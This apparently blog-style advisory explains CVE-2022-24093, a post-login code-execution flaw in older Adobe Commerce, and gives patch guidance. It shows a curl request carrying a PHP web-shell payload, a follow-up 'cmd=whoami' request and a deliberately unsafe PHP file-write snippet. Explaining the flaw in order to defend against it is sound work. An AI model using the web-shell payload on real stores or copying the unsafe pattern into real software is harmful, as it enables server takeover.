CVE-2022-24093 - How A Critical Bug in Adobe Commerce Let Hackers Execute Code Remotely (and What You Need To Know)

Adobe Commerce (previously known as Magento Commerce) is a popular e-commerce platform used by thousands of online stores worldwide. In early 2022, a serious vulnerability was discovered, tracked as CVE-2022-24093, which posed a huge risk for all websites running older versions of Adobe Commerce.  
Let’s break down what this bug is, how it can be exploited, see a code example, and, most importantly, how you can protect your store.

What is CVE-2022-24093?

CVE-2022-24093 is a high-severity vulnerability caused by *improper input validation*.  
That means Adobe Commerce software did not properly check user-supplied data somewhere inside its code. As a result, a hacker could craft a malicious request and, after logging in (post-authentication), use that to execute arbitrary code on the server—the attacker can run any code they want with the webserver’s privileges.

Adobe Commerce 2.3.7-p2 and earlier

If you are using any of these versions, your website is at risk unless you have patched it!

How Does the Exploit Work?

Here’s what makes this bug so dangerous: the vulnerability is in how user inputs are processed after logging into the admin panel. Adobe’s input validation fails to sanitize dangerous payloads in certain parameters.

Proof of Concept Code Snippet

Disclaimer:  
The following code is a simplified, non-destructive *example* designed to illustrate how such payloads might look and should never be used on a system you do not own or have explicit permission to test!

Suppose the vulnerable endpoint is /admin/[module]/[action]. The attacker could send a request like the following (for example, using curl):

curl -s -X POST \
  -H "Content-Type: application/json" \
  -b "PHPSESSID=admin-session-id" \
  -d '{"customAttribute":"<?php system(\$_GET[\"cmd\"]); ?>"}' \
  "https://yourstore.com/admin/module/action";

If the improper input validation allows this to be saved to a PHP file or included in a template, then a follow-up HTTP request like:

https://yourstore.com/path/to/vulnerable/file.php?cmd=whoami

would execute the whoami command on the web server, and the result would be shown in the browser or response.

Below is a *simplified* sample of what broken validation could look like in PHP code

// BAD: Vulnerable input processing (do NOT use)
$user_input = $_POST['customAttribute'];
file_put_contents("/var/www/html/var/tmpfile.php", $user_input);

If an attacker sends PHP code as customAttribute, it will be written directly to a PHP file and could be executed via the web server.

Mitigation and Fix

Adobe patched this vulnerability quickly—patches are available and all store owners are urged to apply them immediately.

If you’re on 2.3.7-p2 or earlier, upgrade to 2.3.7-p3 or later.

Apply Security Patches:

- Adobe sometimes releases independent patches for highly critical vulnerabilities. Download the patch for CVE-2022-24093 from Adobe’s official security bulletin.

Further Reading and References

- Original Adobe Security Bulletin (APSB22-12)
- CVE entry at MITRE
- Magento Open Source Security Patches
- Community advisory & exploit analysis

Summary

CVE-2022-24093 is a critical vulnerability that can allow attackers, after logging into your admin panel, to run any command on your web server. You don’t want to be in the headlines as the next data breach victim!

What to do:

Stay on top of security updates.

Remember: Security is an ongoing process—don’t wait for attackers to find you!


*If you found this article useful, share it with others—you might save someone a lot of trouble!*

Timeline

Published on: 09/12/2023 08:15:00 UTC
Last modified on: 09/12/2023 11:52:00 UTC